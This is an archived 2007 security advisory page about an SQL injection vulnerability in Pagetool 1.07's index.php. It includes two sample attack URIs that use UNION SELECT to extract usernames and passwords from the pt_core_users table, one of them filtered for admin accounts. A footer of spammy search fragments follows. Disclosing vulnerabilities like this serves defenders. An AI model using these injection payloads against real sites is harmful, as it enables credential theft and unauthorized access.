about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Pagetool Index.PHP SQL Injection Vulnerability


Title Pagetool Index.PHP SQL Injection Vulnerability
Published 2007-06-25-12:00AM
Updated 2008-02-26-01:53AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Katatafish is credited with the discovery of this vulnerability.
Vulnerable  Pagetool Pagetool 1.07
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.A sample URI has been provided:http://www.example.com/[path]/index.php?name=pagetool_news&news_id=-1/**/union/**/all/**/select/**/null,/**/null,/**/CONCAT(0x557365726E346D653A20,/**/username),/**/CONCAT(0x50617373773072643A20,/**/passwd),/**/null/**/from/**/pt_core_users/**/where/**/user_id=1http://www.example.com/index.php?name=pagetool_news&news_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/LIKE/**/0x2561646D696E25/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 21:24:20 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
exploit ub deepik mambo remo t294t 20006.madl t499t sexybaba.c t484t CMS is Fre VWar apache 2.0 mambo Remo phpbb port Freesex in google h login.php Artis+porn stegdrama mambo Remo www.usb30. STICKGAMES news for c free sex d modernbill Nudefilm.C Petardas . microsoft pd shop www.freepo CMS is Fre Installing potos sex5gcom CMS is Fre news searc CMS is Fre divx news+for+c www.brazil VNC 4.1.8 WWW.SEXYAR menachem k 89six joomla com SEX X www.slsnb. CMS is Fre SEX+ARAB+V XDIDEOS Www.anak S